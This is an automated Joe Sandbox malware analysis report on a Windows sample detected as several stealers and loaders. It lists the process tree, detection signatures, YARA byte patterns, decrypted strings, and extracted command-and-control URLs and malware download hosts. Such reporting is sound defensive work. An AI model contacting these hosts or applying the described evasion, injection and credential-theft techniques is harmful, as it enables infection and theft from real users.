Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1407288
MD5:699e79d0f4a7586ffe53d0dabc5c0a5a
SHA1:7178ab85fe6190259b64846c76af01b8da5b0cd4
SHA256:b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
Tags:exe
Infos:

Detection

Glupteba, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Found API chain indicative of debugger detection
Found Tor onion address
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1892 cmdline: C:\Users\user\Desktop\file.exe MD5: 699E79D0F4A7586FFE53D0DABC5C0A5A)
    • CasPol.exe (PID: 44120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • InstallUtil.exe (PID: 44140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • JgqIdYSSt70LQLRUqfTzKJw8.exe (PID: 4148 cmdline: "C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
        • JgqIdYSSt70LQLRUqfTzKJw8.tmp (PID: 3692 cmdline: "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe" MD5: F1EEAE7DAB5E51B2A76DB6651423C9F5)
          • simplewebbuilder.exe (PID: 45032 cmdline: "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i MD5: 7BFD8C9EBE20C4BF0BED7F74A74E8646)
          • simplewebbuilder.exe (PID: 6628 cmdline: "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s MD5: 7BFD8C9EBE20C4BF0BED7F74A74E8646)
      • 3cs4PKncIzTPVTZHP3GDsO8B.exe (PID: 45672 cmdline: "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" MD5: 0D69DD3893505245669619A06840C2FE)
        • syncUpd.exe (PID: 45728 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: 220CB1B1688C2364B9AB272E37B896F3)
        • BroomSetup.exe (PID: 46056 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
          • cmd.exe (PID: 44496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 45880 cmdline: "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0 MD5: 918151F14C10B6BB7533F6D97BF22D2D)
        • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 45904 cmdline: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0 MD5: 918151F14C10B6BB7533F6D97BF22D2D)
        • 7odVnHyI6UBWlRBALo6WuNSW.exe (PID: 44560 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version MD5: 918151F14C10B6BB7533F6D97BF22D2D)
      • Ca4kQMpVXP8DY5HQ8cbuvFmH.exe (PID: 45928 cmdline: "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • 1V9g5oUcP4AKlGIaRK4CDHUH.exe (PID: 45968 cmdline: "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • 93gthV73eSBvEuNxXjo0G1yI.exe (PID: 45116 cmdline: "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • FNi4gQqkHn29EqnTv0rxfxe1.exe (PID: 4788 cmdline: "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
        • FNi4gQqkHn29EqnTv0rxfxe1.tmp (PID: 44372 cmdline: "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" MD5: F1EEAE7DAB5E51B2A76DB6651423C9F5)
      • HjvCaWONZRgrucQ7NCpBwfHi.exe (PID: 4724 cmdline: "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • xzRRQmj1LpBxF1iTy72H1YWe.exe (PID: 4480 cmdline: "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0 MD5: BCC38593B03EE04D072E36C9513BCF54)
      • eofj7Pf9I3ORdN1nDBhGJIZl.exe (PID: 2860 cmdline: "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • jUzz7ezNBFbkGCxJO9DOH9dj.exe (PID: 5024 cmdline: "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • NuRMT0uazLQnmOJibnohOTUR.exe (PID: 6424 cmdline: "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • N82pZRBoHBOB1dfNMGUFcUyF.exe (PID: 45596 cmdline: "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • XgAVLWIvGKK9IeCrDuWuJavo.exe (PID: 45608 cmdline: "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0 MD5: 442BA51AC0AF3E8D9F489F643AFA6268)
      • Rk1pfEVtKjXZKi5E0UJ5igqM.exe (PID: 45528 cmdline: "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
      • qvx2vm8LJ8TphvujtDcRyl5q.exe (PID: 44292 cmdline: "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • 2A8JXH5ilBvpWPJYIqcYohVL.exe (PID: 44364 cmdline: "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe" MD5: 0D69DD3893505245669619A06840C2FE)
      • bizN5UTpdWpltkCaYrvmwbQI.exe (PID: 44640 cmdline: "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0 MD5: 45D3B5DA2599B55F638873CE9E5AF959)
      • PvJ9KZy5kaC0ZzTLP46Ng6g6.exe (PID: 44656 cmdline: "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe" MD5: 17B5157E8F35F33EB2325EE5751BCF3B)
      • FnEWeb8TPMfAXv33KZpKVFTq.exe (PID: 44676 cmdline: "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • h9Cux8w1auuBknjQZWKFquuD.exe (PID: 44788 cmdline: "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe" MD5: 89B400AF781E7D55812A77260DC1D9C8)
    • InstallUtil.exe (PID: 44148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 44248 cmdline: C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 44172 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 44224 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cmd.exe (PID: 45008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 45016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 44776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 45392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 45400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Threatname: Socks5Systemz

{"C2 list": ["ddtwcxy.info"]}

Threatname: Vidar

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Simple Web Builder Free\is-L72V0.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 35 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          22.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            22.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
              22.3.syncUpd.exe.8f0000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                22.3.syncUpd.exe.8f0000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                  22.2.syncUpd.exe.8c0e67.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6576, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 44140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: file.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://galandskiyher5.com/downloads/toolspub1.exeAvira URL Cloud: Label: malware
                    Source: http://185.172.128.90/cpa/ping.php?substr=seven&s=abAvira URL Cloud: Label: malware
                    Source: http://galandskiyher5.com/downloads/toolspub1.exe4kLAvira URL Cloud: Label: malware
                    Source: http://15.204.49.148Avira URL Cloud: Label: malware
                    Source: https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=Avira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeAvira: detection malicious, Label: HEUR/AGEN.1315065
                    Source: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                    Source: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                    Source: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                    Source: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                    Found malware configuration
                    Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
                    Source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                    Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                    Source: simplewebbuilder.exe.6628.17.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ddtwcxy.info"]}
                    Multi AV Scanner detection for domain / URL
                    Source: http://185.172.128.145/15f649199f40275b/freebl3.dllVirustotal: Detection: 15%Perma Link
                    Source: http://trade-inmyus.com/index.phpVirustotal: Detection: 15%Perma Link
                    Source: http://185.172.128.145/15f649199f40275b/mozglue.dllVirustotal: Detection: 15%Perma Link
                    Source: http://galandskiyher5.com/downloads/toolspub1.exeVirustotal: Detection: 19%Perma Link
                    Source: http://185.172.128.145/3cd2b41cbde8fc9c.phpVirustotal: Detection: 18%Perma Link
                    Source: http://185.172.128.90/cpa/ping.php?substr=seven&s=abVirustotal: Detection: 21%Perma Link
                    Source: http://185.172.128.187/Virustotal: Detection: 15%Perma Link
                    Source: http://15.204.49.148Virustotal: Detection: 18%Perma Link
                    Source: http://185.172.128.187/ping.php?substr=sevenVirustotal: Detection: 17%Perma Link
                    Source: http://185.172.128.145/15f649199f40275b/sqlite3.dllVirustotal: Detection: 17%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 75%
                    Multi AV Scanner detection for submitted file
                    Source: file.exeVirustotal: Detection: 34%Perma Link
                    Yara detected Glupteba
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: CtIvEWInDoW
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: AgEBOxw
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: /#%33@@@
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: @@@@<@@@
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\%V/yVs
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\*.
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }567y9n/S
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntTekeny
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ging
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: PassMord0
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: J@@@`z`@J@@@J@@@
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: OPQRSTUVWXY
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: 456753+/---- '
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: '--- '
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: qRslaZ9Iw|
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: HeapFree
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: GetLocaleInfoA
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntProcessId
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: wininet.dll
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shlwapi.dll
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shell32.dll
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: .dll
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: column_text
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }67b)>4`,LXZu2L6qd
                    Source: 22.2.syncUpd.exe.400000.0.raw.unpackString decryptor: login:
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,15_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045D254 ArcFourCrypt,15_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045D23C ArcFourCrypt,15_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_10001000 ISCryptGetVersion,15_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_10001130 ArcFourCrypt,15_2_10001130

                    Bitcoin Miner

                    barindex
                    Yara detected Glupteba
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.2d20e67.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: N82pZRBoHBOB1dfNMGUFcUyF.exe PID: 45596, type: MEMORYSTR

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeUnpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack
